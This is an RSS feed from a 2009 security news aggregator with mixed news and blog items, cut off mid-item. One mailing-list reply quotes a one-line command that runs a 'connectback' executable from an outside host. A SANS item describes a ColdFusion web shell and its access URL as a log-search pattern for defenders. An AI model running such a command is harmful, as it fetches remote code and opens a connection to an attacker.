<?xml version="1.0" encoding="UTF-8"?>
<?xml-stylesheet type="text/xsl" media="screen" href="/~d/styles/rss2full.xsl"?><?xml-stylesheet type="text/css" media="screen" href="http://feeds.feedburner.com/~d/styles/itemcontent.css"?><rss xmlns:blogChannel="http://backend.userland.com/blogChannelModule" xmlns:geo="http://www.w3.org/2003/01/geo/wgs84_pos#" xmlns:feedburner="http://rssnamespace.org/feedburner/ext/1.0" version="2.0">
<channel>
<title>Ambersail Security Roundup</title>
<link>http://www.ambersail.com</link>
<language>en</language>
<description>Security News From Around The Web. Syndicated content owned by original publishers. Use at your own risk.</description>
<copyright>Respective Owners</copyright>
<pubDate>Mon, 06 Jul 2009 07:49:55 +0100</pubDate>
<lastBuildDate>Mon, 06 Jul 2009 07:49:55 +0100</lastBuildDate>
<docs>http://www.ambersail.com</docs>
<managingEditor>webmaster@ambersail.com</managingEditor>
<webMaster>webmaster@ambersail.com</webMaster>
<generator>Ambersail Infosec Newsbot</generator>

<image><link>http://www.ambersail.com</link><url>http://www.ambersail.com/images/ambersail_strap.gif</url></image>
<geo:lat>53.3689</geo:lat><geo:long>-2.5941</geo:long><atom10:link xmlns:atom10="http://www.w3.org/2005/Atom" rel="self" href="http://feeds.feedburner.com/AmbersailSecNews" type="application/rss+xml" /><feedburner:browserFriendly>This is Ambersail's Infosec newsfeed. It is intended to be viewed in a newsreader or syndicated to another site, subject to copyright and fair use.</feedburner:browserFriendly><atom10:link xmlns:atom10="http://www.w3.org/2005/Atom" rel="hub" href="http://pubsubhubbub.appspot.com" /><item>
<title>On Air: 'Off The Hook, July 1, 2009'</title>
<guid>http://www.securitycast.net/guid/off_the_hook__20090701.mp3</guid>
<link>http://www.securitycast.net:8000/securitycast.mp3.m3u</link>
<pubDate>Mon, 06 Jul 2009 06:41:01 +0100</pubDate>
<category>security</category>
<description>Emmanuel Goldstein/Off The Hook, July 1, 2009/Off The Hook</description>
</item>
<item>
<title>Why Sarah Palin is no lightweight</title>
<guid>https://blogs.sans.org/security-leadership/?p=736</guid>
<link>https://blogs.sans.org/security-leadership/2009/07/06/why-sarah-palin-is-no-lightweight/</link>
<pubDate>Mon, 06 Jul 2009 06:32:47 +0100</pubDate>
<category>Social Media</category>
<description>NOTE: I will strive to be politically balanced in this post, and report the facts, not push an agenda. It is fine if you do not agree with me, but please check the facts for yourself.
The past few days, Sarah Palin has grabbed the headlines with her resignation as governor of Alaska. The battlelines are [...]</description>
</item>
<item>
<title>Breakfast briefing: BT ditches Phorm and Microsoft eyes your medical records</title>
<guid>http://www.guardian.co.uk/technology/blog/2009/jul/06/breakfast-briefing</guid>
<link>http://www.guardian.co.uk/technology/blog/2009/jul/06/breakfast-briefing</link>
<pubDate>Mon, 06 Jul 2009 06:00:00 +0100</pubDate>
<category>Phorm</category>
<description>&lt;div class="track"&gt;&lt;img alt="" src="http://hits.guardian.co.uk/b/ss/guardiangu-feeds/1/H.15.1/84378?ns=guardian&amp;pageName=Breakfast+briefing%3A+BT+ditches+Phorm+and+Microsoft+eyes+your+medical+rec%3AArticle%3A1242831&amp;ch=Technology&amp;c4=Phorm%2CInternet%2CPrivacy+and+the+net%2CGoogle+%28Technology%29%2CMicrosoft+%28Technology%29%2CTechnology&amp;c6=Bobbie+Johnson&amp;c8=1242831&amp;c9=Article&amp;c10=Blogpost&amp;c11=Technology&amp;c13=&amp;c25=Technology+blog&amp;c30=content&amp;h2=GU%2FTechnology%2Fblog%2FTechnology+blog" width="1" height="1" /&gt;&lt;/div&gt;&lt;p&gt;&amp;bull; Controversial advertising company Phorm has been dealt another blow after main partner &lt;a href="http://www.guardian.co.uk/business/2009/jul/06/btgroup-privacy-and-the-net"&gt;BT decided to pursue &lt;/a&gt;, as we report in &lt;strong&gt;the Guardian&lt;/strong&gt;. More backstory on our &lt;a href="http://www.guardian.co.uk/business/phorm"&gt;Phorm&lt;/a&gt; page.&lt;/p&gt;&lt;p&gt;&amp;bull; The Conservatives plan to &lt;a href="http://www.timesonline.co.uk/tol/news/politics/article6644919.ece"&gt;let patients move their official medical records to private companies such as Microsoft and Google&lt;/a&gt;, according to &lt;strong&gt;the Times&lt;/strong&gt;.&lt;/p&gt;&lt;p&gt;&amp;bull; Some post-weekend reading to get your brain busy on a Monday morning: &lt;br /&gt;First up, Chris Anderson's new book Free is certainly sparking off some interesting conversations, including a contribution from &lt;strong&gt;Mark Cuban&lt;/strong&gt;, who says "&lt;a href="http://blogmaverick.com/2009/07/05/the-freemium-company-lifecycle-challenge/"&gt;When you succeed with Free, you are going to die by Free&lt;/a&gt;"; Here's an intriguing article from &lt;strong&gt;Fast Company&lt;/strong&gt; about how &lt;a href="http://www.fastcompany.com/magazine/137/the-evolution-of-amazon.html"&gt;Amazon is tapping its inner Apple&lt;/a&gt;. 
Finally, this &lt;strong&gt;New York Times&lt;/strong&gt; article on the &lt;a href="http://www.nytimes.com/2009/07/05/business/05pr.html?_r=1"&gt;new way to do public relations in Silicon Valley&lt;/a&gt; has the likes of &lt;a href="http://www.techcrunch.com/2009/07/04/the-reality-of-pr-smile-dial-name-drop-pray/"&gt;Techcrunch&lt;/a&gt; and &lt;a href="http://scobleizer.com/2009/07/05/how-to-reach-normal-users-with-pr-and-with-techcrunchgigaom-et-al/"&gt;Robert Scoble&lt;/a&gt; gabbing, though they miss the crucial paradox: that the crucial PR act here is actually getting the NYT to write about them. &lt;/p&gt;&lt;p&gt;&lt;em&gt;You can follow our links and commentary each day through Twitter (&lt;a href="http://www.twitter.com/guardiantech"&gt;@guardiantech&lt;/a&gt;, or our &lt;a href="http://www.guardian.co.uk/technology/page/2007/dec/10/1"&gt;personal accounts&lt;/a&gt;)&lt;/em&gt;&lt;/p&gt;&lt;div class="related" style="float: left; margin-right: 10px; margin-bottom: 10px;"&gt;&lt;ul&gt;&lt;li&gt;&lt;a href="http://www.guardian.co.uk/business/phorm"&gt;Phorm&lt;/a&gt;&lt;/li&gt;&lt;li&gt;&lt;a href="http://www.guardian.co.uk/technology/internet"&gt;Internet&lt;/a&gt;&lt;/li&gt;&lt;li&gt;&lt;a href="http://www.guardian.co.uk/technology/privacy-and-the-net"&gt;Privacy and the net&lt;/a&gt;&lt;/li&gt;&lt;li&gt;&lt;a href="http://www.guardian.co.uk/technology/google"&gt;Google&lt;/a&gt;&lt;/li&gt;&lt;li&gt;&lt;a href="http://www.guardian.co.uk/technology/microsoft/"&gt;Microsoft&lt;/a&gt;&lt;/li&gt;&lt;/ul&gt;&lt;/div&gt;&lt;div class="terms"&gt;&lt;a 
href="http://www.guardian.co.uk"&gt;guardian.co.uk&lt;/a&gt; &amp;copy; Guardian News &amp; Media Limited 2009 | Use of this content is subject to our &lt;a href="http://users.guardian.co.uk/help/article/0,,933909,00.html"&gt;Terms &amp; Conditions&lt;/a&gt; | &lt;a href="http://www.guardian.co.uk/help/feeds"&gt;More Feeds&lt;/a&gt;&lt;/div&gt;&lt;p style="clear:both" /&gt;</description>
</item>
<item>
<title>Webvan in the Clouds?</title>
<guid>http://gregness.wordpress.com/?p=451</guid>
<link>http://gregness.wordpress.com/2009/07/06/webvan-in-the-clouds/</link>
<pubDate>Mon, 06 Jul 2009 05:46:03 +0100</pubDate>
<category>Uncategorized</category>
<description>Thin Margins, Change and Differentiation
 
As we watch the explosion of cloud events, press releases and panels is anyone getting a sense of déjà vu all over again?  It wasn’t that long ago when Webvan was going to transform the grocery business with new technology and processes. 
 
After a flurry of announcements and expansions we learned that [...]</description>
</item>
<item>
<title>Pimp an electric scooter (in progress..)</title>
<link>http://www.instructables.com/id/Pimp-an-electric-scooter-in-progress/</link>
<pubDate>Mon, 06 Jul 2009 05:41:26 +0100</pubDate>
<category>ride</category>
<description>&lt;img src="http://www.instructables.com/files/deriv/FKH/R413/FWS6JW6H/FKHR413FWS6JW6H.SMALL.jpg" align="left" hspace="10"&gt;A very nice friend gave me this broken electric scooter (probably just a dead battery). Since i have always wanted one from the moment i heard about them i was very happy! Doesn't matter if it's broken because that will just give me a good reason to take it apart and rebuild it like I want it.&lt;br/&gt;
&lt;br/&gt;
I fo...&lt;br/&gt;
&lt;br/&gt;By: &lt;a href="http://www.instructables.com/member/djupblue/"&gt;djupblue&lt;/a&gt;</description>
</item>
<item>
<title>Volatility Call for Bugs</title>
<guid>http://volatility.tumblr.com/post/136203221</guid>
<link>http://volatility.tumblr.com/post/136203221</link>
<pubDate>Mon, 06 Jul 2009 05:27:47 +0100</pubDate>
<description>&lt;a href="http://jessekornblum.livejournal.com/253092.html"&gt;Volatility Call for Bugs&lt;/a&gt;: Jesse Kornblum, our favorite &lt;a href="http://jessekornblum.livejournal.com/"&gt;geek raised by wolves&lt;/a&gt;,  has graciously agreed to help prepare the next release of Volatility.  Please take some time and report any bugs you may have encountered. It’s great to see people willing to step up and contribute back to the community! Remember, &lt;a href="https://www.volatilesystems.com/default/volatility"&gt;Volatility&lt;/a&gt; is powered by the people! Shouts to Jesse!&lt;div class="feedflare"&gt;
&lt;a href="http://feeds.feedburner.com/~ff/AmbersailSecNews?a=XQVsXKm0qcM:VOTj9Lq-2oc:yIl2AUoC8zA"&gt;&lt;img src="http://feeds.feedburner.com/~ff/AmbersailSecNews?d=yIl2AUoC8zA" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/AmbersailSecNews?a=XQVsXKm0qcM:VOTj9Lq-2oc:7Q72WNTAKBA"&gt;&lt;img src="http://feeds.feedburner.com/~ff/AmbersailSecNews?d=7Q72WNTAKBA" border="0"&gt;&lt;/img&gt;&lt;/a&gt;
&lt;/div&gt;</description>
</item>
<item>
<title>Re:  One Click Ownage [White Paper and Scripts]</title>
<guid>http://seclists.org/fulldisclosure/2009/Jul/0031.html</guid>
<link>http://seclists.org/fulldisclosure/2009/Jul/0031.html</link>
<pubDate>Mon, 06 Jul 2009 05:22:22 +0100</pubDate>
<description>Posted by Fredrick Diggle on Jul 5&lt;p&gt;


&lt;p&gt;
Or just
&lt;br /&gt;
&lt;p&gt;'start \\DiggleSec.com\fredrick\connectback.exe'
&lt;br /&gt;
&lt;p&gt;would have also been acceptable.
&lt;br /&gt;
&lt;p&gt;But Fredrick is sure that your 20 page write-up was fantastically entertaining.
&lt;br /&gt;
&lt;p&gt;On Fri, Jul 3, 2009 at 5:50 AM, Ferruh Mavituna&amp;lt;ferruh_at_mavituna&amp;#46;com&amp;gt; wrote:
&lt;br /&gt;
&amp;gt; This is a different and more...</description>
</item>
<item>
<title>Oracle may cut up to 1,000 European jobs</title>
<link>http://www.hackinthebox.org/index.php?name=News&amp;file=article&amp;sid=32128</link>
<pubDate>Mon, 06 Jul 2009 05:04:30 +0100</pubDate>
<description>Oracle may lay off between 850 and 1,000 European employees, according to the French union CFDT. The European Works Council and the Comité d'Entreprise France were notified by Oracle on Monday and Tuesday that 250 positions would be eliminated in France, the union wrote on its blog.

Oracle employs 1,600 in France and 17,000 in Europe, the union said. Oracle had no comment, a company spokeswoman for Oracle Europe said. The union said it has been informed by the company of plans to cut workers due to forecasts that growth in Europe would be slower than expected, according to the CFDT.

That somewhat goes against comments made by the company when it reported its latest quarterly results. Oracle said it was especially pleased with its results in Europe and highlighted 5 per cent growth in the company's applications business</description>
</item>
<item>
<title>Marc Andreessen launches new venture fund</title>
<guid>http://news.cnet.com/8301-19882_3-10279599-250.html</guid>
<link>http://news.cnet.com/8301-19882_3-10279599-250.html?part=rss&amp;subj=news&amp;tag=2547-1_3-0-20</link>
<pubDate>Mon, 06 Jul 2009 05:00:00 +0100</pubDate>
<description>$300 million Andreessen Horowitz fund to back companies large and small, but only Internet-focused.</description>
</item>
<item>
<title>A Computer Forensics Process Tutorial</title>
<guid>http://information-security-resources.com/2009/07/05/a-computer-forensics-process-tutorial/</guid>
<link>http://information-security-resources.com/2009/07/05/a-computer-forensics-process-tutorial/</link>
<pubDate>Mon, 06 Jul 2009 04:51:33 +0100</pubDate>
<description>By Bozidar Spirovski, CISSP, MCSA, MCP. Computer forensics is currently a very popular term, and a lot of conferences are organized around it, or books written on the subject. This, together with the popularity of the CSI series, brings an aura of certain very special, even magical steps that forensics teams use. In reality, the computer forensics job is a standard process, and every one of us does parts of the process when we debug our computers. So, here is a simple tuto</description>
</item>
<item>
<title>On Facebook, a Spy Revealed (Pale Legs, Too) - NYTimes.com</title>
<guid>http://blog.spaf.us/post/136161841</guid>
<link>http://blog.spaf.us/post/136161841</link>
<pubDate>Mon, 06 Jul 2009 04:06:17 +0100</pubDate>
<description>&lt;a href="http://www.nytimes.com/2009/07/06/world/europe/06britain.html"&gt;On Facebook, a Spy Revealed (Pale Legs, Too) - NYTimes.com&lt;/a&gt;&lt;div class="feedflare"&gt;
&lt;a href="http://feeds.feedburner.com/~ff/AmbersailSecNews?a=0t2KXZmxr2k:-XMo-LTfYsg:yIl2AUoC8zA"&gt;&lt;img src="http://feeds.feedburner.com/~ff/AmbersailSecNews?d=yIl2AUoC8zA" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/AmbersailSecNews?a=0t2KXZmxr2k:-XMo-LTfYsg:7Q72WNTAKBA"&gt;&lt;img src="http://feeds.feedburner.com/~ff/AmbersailSecNews?d=7Q72WNTAKBA" border="0"&gt;&lt;/img&gt;&lt;/a&gt;
&lt;/div&gt;</description>
</item>
<item>
<title>Low impact living in Wales</title>
<guid>http://blog.makezine.com/archive/2009/07/low_impact_living_in_wales_1.html?CMP=OTC-0D6B48984890</guid>
<link>http://blog.makezine.com/archive/2009/07/low_impact_living_in_wales_1.html?CMP=OTC-0D6B48984890</link>
<pubDate>Mon, 06 Jul 2009 04:00:09 +0100</pubDate>
<category>Remake</category>
<description>&lt;p&gt;&lt;span class="mt-enclosure mt-enclosure-image" style="display: inline;"&gt;&lt;img alt="front.jpg" src="http://blog.makezine.com/front.jpg" width="600" height="420" class="mt-image-none" style="" /&gt;&lt;/span&gt;&lt;/p&gt;

&lt;p&gt;Looking to live simply and in harmony with the land they would raise their children on, one couple in Wales set out to &lt;a href="http://www.simondale.net/house/index.htm"&gt;build a hand crafted house on a modest budget&lt;/a&gt;. &lt;/p&gt;

&lt;blockquote&gt;
The basic construction is a series of vertical posts in an oval, the tops of which are connected with horizontals. This ring of horizontal pieces makes what is conventionally referred to as a roofplate or wallplate. The horizontals are 'tennoned' into the posts although a simpler alternative is to 'half lap' the horizontals and use a metal bar / big nails to fix the joint on top of the post.
&lt;/blockquote&gt;

&lt;p&gt;&lt;span class="mt-enclosure mt-enclosure-image" style="display: inline;"&gt;&lt;img alt="sunnypan.jpg" src="http://blog.makezine.com/sunnypan.jpg" width="600" height="259" class="mt-image-none" style="" /&gt;&lt;/span&gt;&lt;/p&gt;

&lt;p&gt;Their &lt;a href="http://www.simondale.net/"&gt;site&lt;/a&gt; has lots of details about the construction, theory behind the build, and ideology surrounding their choices. The &lt;a href="http://www.simondale.net/house/archive/index.htm"&gt;photos page&lt;/a&gt; has full sized images of all the pictures on the site. &lt;/p&gt;
        &lt;a href="http://blog.makezine.com/archive/2009/07/low_impact_living_in_wales_1.html?CMP=OTC-0D6B48984890" /&gt;Read more&lt;/a&gt; | &lt;a href="http://blog.makezine.com/archive/2009/07/low_impact_living_in_wales_1.html?CMP=OTC-0D6B48984890" /&gt; Permalink&lt;/a&gt; | &lt;a href="http://blog.makezine.com/archive/2009/07/low_impact_living_in_wales_1.html?CMP=OTC-0D6B48984890#comments" /&gt;Comments&lt;/a&gt; | 
        
        
        
        
        
        
        
        &lt;a href="http://blog.makezine.com/archive/remake/?CMP=OTC-0D6B48984890" /&gt;Read more articles in Remake&lt;/a&gt; | 
        
        
        &lt;a href="http://digg.com/submit?url=blog.makezine.com%2Farchive%2F2009%2F07%2Flow_impact_living_in_wales_1.html&amp;title=Low%20impact%20living%20in%20Wales&amp;bodytext=%20Looking%20to%20live%20simply%20and%20in%20harmony%20with%20the%20land%20they%20would%20raise%20their%20children%20on%2C%20one%20couple%20in%20Wales%20set%20out%20to%20build%20a%20hand%20crafted%20house%20on%20a%20modest%20budget.%20The%20basic%20construction%20is%20a%20series%20of...&amp;topic=tech_news" /&gt;Digg this!&lt;/a&gt;&lt;div class="feedflare"&gt;
&lt;a href="http://feeds.feedburner.com/~ff/AmbersailSecNews?a=ZMLtDyRlmSM:H2FgPFu2mEE:yIl2AUoC8zA"&gt;&lt;img src="http://feeds.feedburner.com/~ff/AmbersailSecNews?d=yIl2AUoC8zA" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/AmbersailSecNews?a=ZMLtDyRlmSM:H2FgPFu2mEE:7Q72WNTAKBA"&gt;&lt;img src="http://feeds.feedburner.com/~ff/AmbersailSecNews?d=7Q72WNTAKBA" border="0"&gt;&lt;/img&gt;&lt;/a&gt;
&lt;/div&gt;</description>
</item>
<item>
<title>Administrivia: Happy Fourth of July!  Also upgrading site for our  Tenth Anniversary !</title>
<guid>6348 at http://www.privacydigest.com</guid>
<link>http://www.privacydigest.com/2009/07/05/administrivia+happy+fourth+july+also+upgrading+site+our+tenth+anniversary</link>
<pubDate>Mon, 06 Jul 2009 03:45:02 +0100</pubDate>
<category>Activists</category>
<description>&lt;p&gt;Hello folks !! For those of you in the USA, I hope that you have had a good Fourth of July (and Canadians enjoyed Canada day on July 1) and didn't eat too much BBQ.&lt;/p&gt;
&lt;p&gt;Sorry for the shortage of updates over the last few days, but I've been a bit busy recently and have also been working on upgrading the site.&lt;/p&gt;
&lt;p&gt;Besides being the birthday of the United States, July 4th was also the &lt;strong&gt;10th Anniversary&lt;/strong&gt; of Privacy Digest. I started the site back in 1999 after migrating some material from an old general blog. I had hoped to have the upgrade completed by the Fourth, but it turned out to be a bit more involved than I had originally expected. &lt;/p&gt;
&lt;p&gt;It is also two major parts. The first was upgrading the base CMS that I use, and the second part will involve adding some interesting new functionality that I think you will appreciate. I don't have much time this week, but I hope to have the base CMS upgraded in the next few days. I will then start phasing in the new features over the rest of the month.&lt;/p&gt;</description>
</item>
<item>
<title>Re: NSE argument table syntax</title>
<guid>http://seclists.org/nmap-dev/2009/q3/0031.html</guid>
<link>http://seclists.org/nmap-dev/2009/q3/0031.html</link>
<pubDate>Mon, 06 Jul 2009 03:18:10 +0100</pubDate>
<description>Posted by David Fifield on Jul 5&lt;p&gt;


&lt;p&gt;
On Sat, Jul 04, 2009 at 10:39:23AM -0300, Joao Correa wrote:
&lt;br /&gt;
&amp;gt; Here follows the patch fixing whois.nse and dns-zone-transfer.nse to
&lt;br /&gt;
&amp;gt; enable the use of the new arguments table syntax.
&lt;br /&gt;
&lt;p&gt;The only changes I would make to these is to try the new syntax before
&lt;br /&gt;
the old syntax, and add comments...</description>
</item>
<item>
<title>Twitter Weekly Updates for 2009-07-05</title>
<guid>http://www.dragoslungu.com/2009/07/05/twitter-weekly-updates-for-2009-07-05/</guid>
<link>http://feedproxy.google.com/~r/DragosLunguDotCom/~3/MBv8gMtzgKw/</link>
<pubDate>Mon, 06 Jul 2009 02:15:00 +0100</pubDate>
<category>Uncategorized</category>
<description>@flibeau welcome  in reply to flibeau #
Reading: &amp;#8220;Yoggie New Secure USB Flash Drive&amp;#8221;- Embedded antivirus and 256-bit AES hardware based encryption ( http://bit.ly/9Fh2L ) #
blown away by @netwitness NextGen architecture and  data flow  + seamless integration with @arcsight . Great ! #
@iboldizsar lucky you ! Enjoy   in reply to iboldizsar [...]</description>
</item>
<item>
<title>Battery desulfator</title>
<guid>http://hackaday.com/?p=12452</guid>
<link>http://hackaday.com/2009/07/05/battery-desulfator/</link>
<pubDate>Mon, 06 Jul 2009 02:00:04 +0100</pubDate>
<category>tool hacks</category>
<description>Hack a Day favorite [Mikey Sklar] is back with a new project. Mini-D is a battery desulfator. If a 12V lead-acid battery sits with a voltage below 12.3V, sulfur crystals will begin to form on the lead plates. This crystal growth increases the internal resistance and eventually makes the battery unusable. A battery desulfator sends [...]</description>
</item>
<item>
<title>Developing Proposal Financial Models</title>
<guid>32738@http://blogs.ittoolbox.com/eai/implementation/archives/</guid>
<link>http://networking.ittoolbox.com/r/rss.asp?url=http://blogs.ittoolbox.com/eai/implementation/archives/developing-proposal-financial-models-32738</link>
<pubDate>Mon, 06 Jul 2009 01:46:46 +0100</pubDate>
<description>The purpose of this task is to translate the estimates and schedule into the costs of delivering the proposed solution and to determine the price for the solution as it is described in the proposal.  Identifying Costs  Before beginning this step, ens...</description>
</item>
<item>
<title>pOg productions added a video</title>
<guid>00000000002fb25a000000000047c8a53526d20024bf0c3d</guid>
<link>http://www.exoticliability.com</link>
<pubDate>Mon, 06 Jul 2009 01:24:55 +0100</pubDate>
<description>&lt;span class="feed-string"&gt;&lt;a href="http://www.exoticliability.com/profile/pjtorney?xg_source=activity"&gt;pOg productions&lt;/a&gt; added a video&lt;/span&gt;&lt;br/&gt;&lt;div class="rich rich-96"&gt;&lt;div class="rich-thumb"&gt;&lt;a href="http://www.exoticliability.com/xn/detail/3125850:Video:5924?xg_source=activity"&gt; &lt;img src="http://api.ning.com/files/hVOtPiqqHiDhLDz6si8pmW7M47l-hZWOXcdpiGhFzPfOCl-k8SIMajEkvD62Cc8mBLdNQuOdmuxyK2m6y2S*MG4koOjbc57k/338229145.jpeg" width="96" height="96" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class="rich-detail"&gt;&lt;div class="rich-date"&gt;&lt;/div&gt;&lt;/div&gt;&lt;/div&gt;&lt;div class="feedflare"&gt;
&lt;a href="http://feeds.feedburner.com/~ff/AmbersailSecNews?a=R2DAvmTl7as:XgA9fB6oy1c:yIl2AUoC8zA"&gt;&lt;img src="http://feeds.feedburner.com/~ff/AmbersailSecNews?d=yIl2AUoC8zA" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/AmbersailSecNews?a=R2DAvmTl7as:XgA9fB6oy1c:7Q72WNTAKBA"&gt;&lt;img src="http://feeds.feedburner.com/~ff/AmbersailSecNews?d=7Q72WNTAKBA" border="0"&gt;&lt;/img&gt;&lt;/a&gt;
&lt;/div&gt;</description>
</item>
<item>
<title>Terror law boss backs Gary McKinnon's fight: New support for Asperger's victim facing extradition</title>
<guid>0907052IKT3G</guid>
<link>http://www.topix.net/tech/computer-security/2009/07/terror-law-boss-backs-gary-mckinnons-fight-new-support-for-aspergers-victim-facing-extradition?fromrss=1</link>
<pubDate>Mon, 06 Jul 2009 01:10:24 +0100</pubDate>
<description>&lt;p&gt;Affront to justice: Lord Carlile says Parliamentarians have a duty to protect the vulnerable and eccentric, such as Gary McKinnon. The Home Secretary has been warned by his own adviser on terror laws not to allow the extradition of autistic computer hacker Gary McKinnon.&lt;/p&gt;</description>
<enclosure url="http://www.topix.net/bigpic/mini-06c998e442981665e08d73215bb3addd" length="18949" type="image/jpeg" />
</item>
<item>
<title>More on ColdFusion hacks, (Sun, Jul 5th)</title>
<guid>http://isc.sans.org/diary.php?storyid=6730&amp;rss</guid>
<link>http://isc.sans.org/diary.php?storyid=6730&amp;rss</link>
<pubDate>Sun, 05 Jul 2009 23:00:59 +0100</pubDate>
<description>Thanks to our readers Adam and Oobi we received some additional information regarding recent ColdFusion hacks.&lt;br /&gt;
&lt;br /&gt;
As I wrote in the previous diary (http://isc.sans.org/diary.html?storyid=6715), the attackers are exploiting vulnerable FCKEditor installations, which come enabled by default with ColdFusion 8.0.1 as well as some other ColdFusion packages.&lt;br /&gt;
&lt;br /&gt;
The first thing the attackers do is upload a ColdFusion web shell, a script very similar to the ASP.NET or PHP web shells we've been writing so much about. The web shell I analyzed is very powerful and seems to be recent: according to the date in the script, it was released on the 23rd of June by a Chinese hacker, Seraph.&lt;br /&gt;
&lt;br /&gt;
The script has a simple authentication mechanism: it verifies what the URL parameter action is set to, as can be seen in the screenshot below:&lt;br /&gt;
&lt;br /&gt;
If the parameter action is set to seraph, the user can access the web site, otherwise the script just prints back seraph. In other words, the URL the attacker accesses after uploading the script will look something like this: http://www.hacked.site/uploaded_file.cfm?action=seraph&lt;br /&gt;
&lt;br /&gt;
A nice thing (for us doing forensics, at least) is that you can now grep through your logs for action=seraph to see if you have been hacked with the same script. Keep in mind that this is not a definite test, of course, since the action variable's name can be easily modified.&lt;br /&gt;
&lt;br /&gt;
--&lt;br /&gt;
Bojan&lt;div class="feedflare"&gt;
&lt;a href="http://feeds.feedburner.com/~ff/AmbersailSecNews?a=ENa8y2CBMx0:fNJ1xHNuYaE:yIl2AUoC8zA"&gt;&lt;img src="http://feeds.feedburner.com/~ff/AmbersailSecNews?d=yIl2AUoC8zA" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/AmbersailSecNews?a=ENa8y2CBMx0:fNJ1xHNuYaE:7Q72WNTAKBA"&gt;&lt;img src="http://feeds.feedburner.com/~ff/AmbersailSecNews?d=7Q72WNTAKBA" border="0"&gt;&lt;/img&gt;&lt;/a&gt;
&lt;/div&gt;</description>
</item>
<item>
<title>Top Five Reasons to Attend Black Hat USA</title>
<guid>http://infosecevents.net/2009/07/06/top-five-reasons-to-attend-black-hat-usa/</guid>
<link>http://feedproxy.google.com/~r/InfosecEvents/~3/UzwsArgTGv8/</link>
<pubDate>Sun, 05 Jul 2009 22:31:00 +0100</pubDate>
<category>Security Conferences</category>
<description>This is an updated post from last year, with a similar post title of Top 5 Reasons to Attend Black Hat USA. 
So what makes Black Hat USA so good, and why do we keep coming back? Here are our top five reasons to attend Black Hat USA. 

Excellent Presentations – There are eight session [...]</description>
</item>
<item>
<title>Linux console RSS reader Snownews</title>
<guid>http://www.ghacks.net/?p=13203</guid>
<link>http://www.ghacks.net/2009/07/05/linux-console-rss-reader-snownews/</link>
<pubDate>Sun, 05 Jul 2009 22:03:09 +0100</pubDate>
<category>Linux</category>
<description>I read a lot of news. One of the many ways I read news is via RSS feeds. If you don&amp;#8217;t know, RSS stands for Really Simple Syndication. What an RSS reader does is collect summaries of news feeds from your favorite sites and places them in a simple, easy to read format. Most RSS [...]</description>
</item>
<item>
<title>Paimei – Reverse Engineering Framework</title>
<guid>tag:blogger.com,1999:blog-2543448378934813325.post-5047485194299593453</guid>
<link>http://mubix.blogspot.com/2009/07/paimei-reverse-engineering-framework.html</link>
<pubDate>Sun, 05 Jul 2009 21:46:00 +0100</pubDate>
<description>&lt;p&gt;&lt;a href="http://code.google.com/p/paimei/"&gt;http://code.google.com/p/paimei/&lt;/a&gt;&lt;/p&gt;</description>
</item>
<item>
<title>Rochto’s…excited about the Duran Duran concert tonight.</title>
<guid>http://stepto.com/Lists/Posts/ViewPost.aspx?ID=576</guid>
<link>http://stepto.com/Lists/Posts/ViewPost.aspx?ID=576</link>
<pubDate>Sun, 05 Jul 2009 21:43:08 +0100</pubDate>
<category>Rochto</category>
<description>&lt;div&gt;&lt;b&gt;Title:&lt;/b&gt; Rochto’s…excited about the Duran Duran concert tonight.&lt;/div&gt;
&lt;div&gt;&lt;b&gt;Body:&lt;/b&gt; &lt;div class=ExternalClass3D662163CBE04812974EB7040EAB2DB3&gt;&lt;p&gt;&lt;font size=2&gt;And I thought I was chatty on social media.  Turns out she just needed the right topic, clipped from her Facebook:&lt;/font&gt;&lt;/p&gt; &lt;blockquote&gt; &lt;p&gt;Rochelle Conway Toulouse What a fabulous weekend! Awesome fireworks displays (yes that's multiple) in our very own Big Rock Ridge!!! Tonight - More awesomeness. Time to be a teenager again. Going to see my ALL TIME FAVORITE BAND EVER - DURAN DURAN!!!! I love you John, Simon, Nick, and Roger!!!!  &lt;p&gt;-- &lt;p&gt;Okay - I can't post about this enough. I'm hitting a nostalgia trip. Got the DD DVD Greatest Hits blaring in the background. I still remember when I first fell in love w/the band. I was 11 and saw the music video &amp;quot;The Reflex&amp;quot; on my best friend's HUGE projection TV - Ah the days of MTV. Yes...I was a late Duranie bloomer. Didn't become a fan until &amp;quot;Seven and the Ragged Tiger&amp;quot;...but it wasn't too soon after that I had the 2 previous albums: “Duran Duran” and “Rio”.  &lt;p&gt;-- &lt;p&gt;Then &amp;quot;Arena&amp;quot;!!! Oh how so many times I would go to the video store to rent &amp;quot;Blue Silver&amp;quot; on VHS (which now, yes, I own on DVD). And staying up until 5:00am to watch the premier video of &amp;quot;Wild Boys&amp;quot; on MTV. Remember Friday Night Video??? Oh the days - I'd stay up late just to see DD host! My bedroom wall was surrounded w/DD posters - I mean ALL walls including the ceiling. Teeny bop magazines and Japanese imports!!!  &lt;p&gt;-- &lt;p&gt;I'm so blessed to have married a fellow Duranie. We were at the same &amp;quot;Big Thing&amp;quot; concert at Arcadia in Dallas when we were 15!!! And I have been so ever blessed to have seen DD perform every year in Seattle since we moved here in 2003. Not to mention the concerts in Dallas!!! I feel 15 all over again!!!  
&lt;p&gt;-- &lt;p&gt;Duran Duran - God Bless you for still touring!!! And for picking Seattle this year as one of the few &amp;quot;select&amp;quot; cities. Looking forward to an amazing concert!!!!&lt;/p&gt;&lt;/blockquote&gt;&lt;/div&gt;&lt;/div&gt;
&lt;div&gt;&lt;b&gt;Category:&lt;/b&gt; Rochto&lt;/div&gt;
&lt;div&gt;&lt;b&gt;Published:&lt;/b&gt; 7/5/2009 1:43 PM&lt;/div&gt;
&lt;div&gt;&lt;b&gt;Modified:&lt;/b&gt; 7/5/2009 1:43 PM&lt;/div&gt;
&lt;div&gt;&lt;b&gt;Modified By:&lt;/b&gt; Stepto&lt;/div&gt;
&lt;div&gt;&lt;b&gt;Created By:&lt;/b&gt; stepto@stepto.com&lt;/div&gt;</description>
</item>
<item>
<title>Secret Service tells UK Government not to Publicly Disclose Data Breaches</title>
<guid>tag:blogger.com,1999:blog-3798604115389836864.post-1246434451445798102</guid>
